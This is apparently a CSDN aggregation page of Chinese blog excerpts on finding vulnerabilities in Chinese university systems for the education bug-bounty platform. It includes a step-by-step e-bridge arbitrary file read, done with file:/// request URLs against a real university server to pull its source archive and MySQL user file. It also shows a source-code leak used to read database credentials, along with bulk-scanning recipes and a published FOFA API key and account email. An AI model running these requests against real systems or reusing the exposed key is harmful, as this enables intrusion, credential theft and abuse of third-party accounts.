精华内容
下载资源
问答
  • 教育src
    千次阅读 热门讨论
    2021-02-17 01:07:40


    参考:
      【侵删】《教育SRC的挖掘思路和一些小方法 》
    地址:https://mp.weixin.qq.com/s/7LPpG2ZfkxENxZyuDbPwZg
    作者:北美第一突破手 WgpSec狼组安全团队
    创作日期:2021年2月16日

    平时常见的SRC平台诸如补天、漏洞盒子等,
    今天向教育SRC平台进击:
    教育行业漏洞报告平台(Beta),
    地址https://src.sjtu.edu.cn(邀请码和免邀请码两种注册方式)

    可以看到平台在更新,但注册之后才能查看公布的漏洞信息:
    在这里插入图片描述


    进入正题:
      dalao最近在教育SRC挖了10个左右漏洞,拿到30rank。
    今天看看dalao对教育SRC的挖掘思路。

    1.寻找测试目标

    日常接触过的Shodan和Fofa等信息收集平台,个人尝试过,但如dalao所说,普通会员都把前几页翻了遍,没有超级会员很难找到合适的目标。所以推荐Google-Hacking。

    dalao推荐常用教育src谷歌语法:
    intext:教务系统管理平台(发现冒号后不空格也可以)
    intext:职业技术学院(职业院校的安全意识可能更差)
    intext:职业技术学院 inurl:login。
    登录页面属于敏感页面,官网主页可能托管,但登录页面往往与学校的IP相关。通过这种方式可以扫C段扩大测试范围。

    2.收集C段

    dalao认为C段是信息收集阶段最重要的一环,也是最容易出洞的地方。懂得都懂,学校常常把各个学院的站点放在一个C段的不同IP地址,目标多了碰到惊喜的概率更大。

    dalao介绍了一款火狐和谷歌上都有的插件:Shodan。可以在打开网址后,简单迅速地判断IP和开放端口。
    可能有误报,但可以看出对方是不是套了CF,部分避免无用的C段收集。(CF,全称cloudflare,一个CDN服务商,给网站套CF可以隐藏VPS IP、控制网站访问速度、设置防御规则等)

    C段收集方法:Shodan + Fofa。
    通过google-hacking找到合适目标后,
    利用Shodan判断出IP,
    再使用Fofa查看C段。
    Fofa的语法是:ip=“192.168.1.0/24”,作用是将Fofa扫描过的C段列出来。
    虽然更新有时会不及时,但很适合走马观花般快速挖掘SRC。

    3.挖掘注意的小技巧

    (1)隔三岔五更新自己的弱口令字典。
    (2)修改返回包。

    关于教育src邀请码:拒绝白嫖,溢价影响也不好,所以不用再问了。

    更多相关内容
  • 作为刚接触渗透的小伙伴儿肯定都想快速挖到漏洞提交平台获取注册码,或者想获取更多积分换取证书,这篇文章就是为了帮助各位师傅们快速上手挖取教育src

    0、关于为什么要写这篇文章

    作为刚接触渗透的小伙伴儿肯定都想快速挖到漏洞提交平台获取注册码,或者想获取更多积分换取证书,这篇文章就是为了帮助各位师傅们快速上手挖取教育src

    1、开始前准备

    每一次成功的渗透,都有一个非常完备的信息搜集。某老师傅说的:信息搜集的广度决定了攻击的广度,知识面的广度决定了攻击的深度。信息搜集永远都是渗透人员最重要的必修课,关于信息搜集想必其他的文章都已经提到很多了,比如子公司,域名,子域名,IPV4,IPV6,小程序,APP,PC软件等等,我这儿既然是快速挖取就肯定是用工具来帮助我们

    在这里的话建议在自己服务器或者虚拟机装一个ARL灯塔资产信息搜集工具,下面的内容也是基于这款工具进行讲解

    2、信息搜集工具安装

    「ARL资产安全灯塔」简单来说就是一款信息收集的神奇,用起来非常方便快捷,比纯手工去信息收集快很多,用起来也是爽到飞起,十分推荐。
    灯塔是基于docker的,所以需要大家先在linux上安装docker,docker安装很快的,按照步骤几分钟就搞定
    Centos安装Docker教程
    Kali安装Docker教程

    (1)从github克隆ARL

    git clone https://github.com/TophantTechnology/ARL
    

    在这里插入图片描述

    (2)进入桌面的ARL文件夹下的docker文件夹

    cd ARL
    cd docker
    

    在这里插入图片描述

    (3)创建容器数据卷

    docker volume create --name=arl_db
    

    在这里插入图片描述

    (4)启动ARL

    docker-compose up -d
    

    在这里插入图片描述
    等待下载安装就行,之后会自动启动

    (5)配置fofa-api:

    安装完成后确定进入ARL/docker目录下,编辑config-docker.yaml文件

    vim config-docker.yaml
    

    配置自己的FOFA-API信息如下: PS:(fofa-api在登陆fofa之后,个人中心处查看,这儿最好是有fofa高级会员,因为普通会员只能查看60条数据,高级会员能看10W条,高级会员搜集信息更加全面,这里我提供自有高级会员API)

    FOFA:
      URL: "https://fofa.info"
      EMAIL: "hackfreedom@qq.com"
      KEY: "a12cb19bef004a5a5524a58a5e2bee69"
    

    配置好后如图:
    在这里插入图片描述

    (6)登陆到ARL

    https://你的ip地址:5003
    

    这里的ip就是kali的ip,如果你的kali安装在虚拟机,你可以用kali自带的火狐浏览器打开,也可以在本机上用自己的浏览器输入kali虚拟机的ip进行访问。

    Tips ~:如果你输入ip还是访问不了,记得检查一下是不是https,输入http是打不开的,要输入https。
    在这里插入图片描述
    账号:admin

    密码:arlpass
    登陆之后进入主页:
    在这里插入图片描述
    最后一步,配置一下资产搜集策略,新建一个策略,输入一个策略名称,之后把所有能选的都选上,提交就行

    在这里插入图片描述

    3、漏洞挖掘

    (1)登陆灯塔资产搜集工具,使用如下语法:

    host="edu.cn" && country="CN"
    

    这个语句基本上能查找出来fofa中所有的页面了
    在这里插入图片描述

    (2)灯塔里边,任务管理,选择fofa任务下发,输入查询语句,进行测试,能返回结果就行,接下来点确定

    在这里插入图片描述

    (3)之后就是等待,因为结果太多,看你电脑性能,至少也要1天,等搜集结束就行

    在这里插入图片描述

    (4)结束之后点进去,灯塔搜集资产时自带poc会帮我们发现漏洞点或者文件泄露点

    在这里插入图片描述

    (5)接下来就是挨个验证,我这里给大家举个例

    这个文件泄露点,你访问之后会下载该大学的程序源代码
    在这里插入图片描述
    解压之后就是所有程序源代码,
    在这里插入图片描述
    直接查看配置文件就能发现数据库连接账号密码等
    在这里插入图片描述

    (6)去教育src平台提交漏洞等待审核通过就行啦

    在这里插入图片描述
    祝各位师傅早日挖到src漏洞,获取证书,创作不易,点个赞呗~~

    展开全文
  • 记一次教育src挖掘,已提交漏洞,不要真的就只是对主站进行测试了,一般像这种主站都是比较安全的,大概率采用一些站群系统,像学校很多使用博达的统一管理,自带 waf

    0x00 目标

    假设要渗透的网站为xxx大学,官网为:www.xxx.edu.cn

    0x01 信息收集

    不要真的就只是对主站进行测试了,一般像这种主站都是比较安全的,大概率采用一些站群系统,像学校很多使用博达的统一管理,自带 waf

    0x01-1 子域名采集

    可以通过 subdomain3,fuzzdomain,subDomainsBrute,seay 子域名爆破

    也可以用 fofa,shadon 这些个网络空间搜索引擎

    如下图

    image-20211218105038653

    0x01-2 端口信息

    通过上面 子域名采集信息,得知 ip 地址,使用端口扫描工具扫描。发现可利用端口进行利用(这里没有可利用端口)

    image-20211218105143027

    0x01-3 敏感信息搜集

    1. github 搜索
    2. google hacking
    3. 凌风云网盘搜索

    搜集一些敏感的东西,邮箱的使用(例如:腾讯的企业邮箱),vpn(深信服?

    展开全文
  • 实战篇——教育src(一)

    千次阅读 2021-03-15 00:19:43
    首先,我们进行教育src挖掘的时候最好批量扫,因为一个一个的效率不高,我们的目的是积分,最好是批量扫。当然如果你有源码,可以试着找一下通用漏洞。 其次,在我们扫描后发现有自己不知道的漏洞,这时候可以百度...

    最近事太多了,没办法文章写的断断续续。已经两周没更新了,本来计划的内容还没有准备。想到之前有粉丝说出一些实战的。那就出些简单的。
    今天,我就拿我前几天的案例说说。
    首先,我通过FOFA进行批量查询org=“China Education and Research Network Center” && port=“8088”
    在这里插入图片描述

    然后通过Goby进行测试
    在这里插入图片描述
    用goby自带poc测试在这里插入图片描述
    进一步测试(扩大战果):
    访问http://马赛克:8088/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///usr/ebridge&fileExt=txt
    获得id:d5782d64b44e4c68999d094a32001c23
    在这里插入图片描述
    访问http:///马赛克:8088/file/fileNoLogin/d5782d64b44e4c68999d094a32001c23
    发现ebridge.tar.gz
    访问http:///马赛克:8088/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///usr/ebridge/ebridge.tar.gz&fileExt=txt
    获得id:fb5a41d9af304a1b992e175ba68ac4e8
    访问http:///马赛克:8088/file/fileNoLogin/fb5a41d9af304a1b992e175ba68ac4e8
    下载ebridge.tar.gz
    解压发现\ebridge\mysql\data\mysql下存在user.MYD在这里插入图片描述

    为防止后期有修改,故访问http://马赛克:8088/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///usr/ebridge/mysql/data/mysql/user.MYD&fileExt=txt
    获得id:d1251c6b1c8e4434add56fd6b712be96
    访问http://马赛克:8088/file/fileNoLogin/d1251c6b1c8e4434add56fd6b712be96
    即可以获得最新user.MYD
    在这里插入图片描述
    打开获得用户和密码在这里插入图片描述
    至此结束。
    好,现在我们来总结一下。
    首先,我们进行教育src挖掘的时候最好批量扫,因为一个一个的效率不高,我们的目的是积分,最好是批量扫。当然如果你有源码,可以试着找一下通用漏洞。
    其次,在我们扫描后发现有自己不知道的漏洞,这时候可以百度一下比如说我们不懂xx漏洞,我们搜一下xx漏洞利用一般都有人写过。
    还有,当我们成功复现漏洞后,最好尝试提权扩大战果。值得注意的是,千万不要借此扫内网。扫出事了可别怪我没提醒。
    以下是教育src平台的测试规则:在这里插入图片描述
    最后,我们提交后别报得积分的希望,多半重复。挖教育src心态必须好,可能你辛辛苦苦挖了半天全是重复的。(我这个就是重复的)
    (ps:终于赶了一篇出来,还是求各位看官给点评论和关注)

    展开全文
  • 记一次教育src挖洞

    千次阅读 2021-06-03 10:26:15
    记一次教育src挖洞fofa搜索了一下,找到一个有sql注入的教育网站漏洞url:http://x.x.x.x:8090/login功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个...
  • edusrc教育src漏洞平台

    千次阅读 2022-03-01 23:06:14
    听说2022年度前十会有证书,这不得冲一波
  • 教育 SRC 报告平台信息提取脚本: 使用爬虫爬取页面信息,通过 lxml 库提取漏洞信息 读取10页的漏洞信息: import requests,time from lxml import etree def edu_list(page): for page in range(1,page+1): try: ...
  • SRC 挖掘-教育行业平台&规则&批量自动化参考:https://src.sjtu.edu.cn/introduction/1.法律法规:第八条 按照对信息系统
  • 渗透实战之教育SRC挖掘经验

    千次阅读 2021-10-12 14:44:38
    今天看到这篇好文章,绝了,又学到很多好姿势,分享给大家 前言 每一次成功的渗透,都有一个非常完备的信息搜集。 大师傅讲的好呀:信息搜集的广度决定了攻击的广度,知识面的广度决定了攻击的深度。...
  • SRC——教育漏洞平台

    千次阅读 2022-02-25 15:21:49
    常规漏洞:利用漏扫工具扫,或者拿到url跑脚本批量验证,挂在服务器上批量跑就行了 特殊漏洞(定点检测):经常关注最新安全情报(知道创宇、cvvd等平台),收集最新poc、exp...教育平台评分规则(以官网为主): ...
  • 寻找web.config,看配置文件或...src挖掘-教育行业平台,规则,批量自动化。4.无源码情况下,js接口数据提交测试模拟。3.只收前端打入的漏洞平台-针对闭源系统。-jsfinder工具,手工,扫描。cnvd漏洞平台,盒子,补天。
  • 参考: https://src.sjtu.edu.cn/introduction/ 1.法律法规: 第八条 按照对信息系统机密性、可用性、完整性等三方面要素的影响评估,漏洞风险发现与技术验 证应遵循无害化原则: (一)信息系统机密性无害化验证...
  • 这开头都要从蝙蝠说起… 是一个针对,作业不能粘贴 而引发的 总的来说,算不上安全漏洞 但也是一个漏洞 不多说,上图 不能复制粘贴 随便输入一个数字,利用google前端调试工具,或者火狐debug ...
  • SRC经验文档
  • 教会教育网站

    2021-02-27 05:44:48
    更新数据转到根文件夹,然后输入/src/data ,编辑JSON文件。 courses.json所有课程数据将显示在“教育”页面中growths.json所有数据将显示在Growth页面中news.json所有数据将显示在“新闻”页面中消息资料格式日期:...
  • 在接触src之前,我和很多师傅都有同一个疑问,就是那些大师傅是怎么挖漏洞的?与日常靶场训练不同,SRC漏洞挖掘更偏向于对业务资产的熟悉程度,除了需要掌握渗透测试的技术要点以外,可以思考一下是否在信息收集这一...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 15,814
精华内容 6,325
关键字:

教育src

友情链接: Seven_fight(v1.2).rar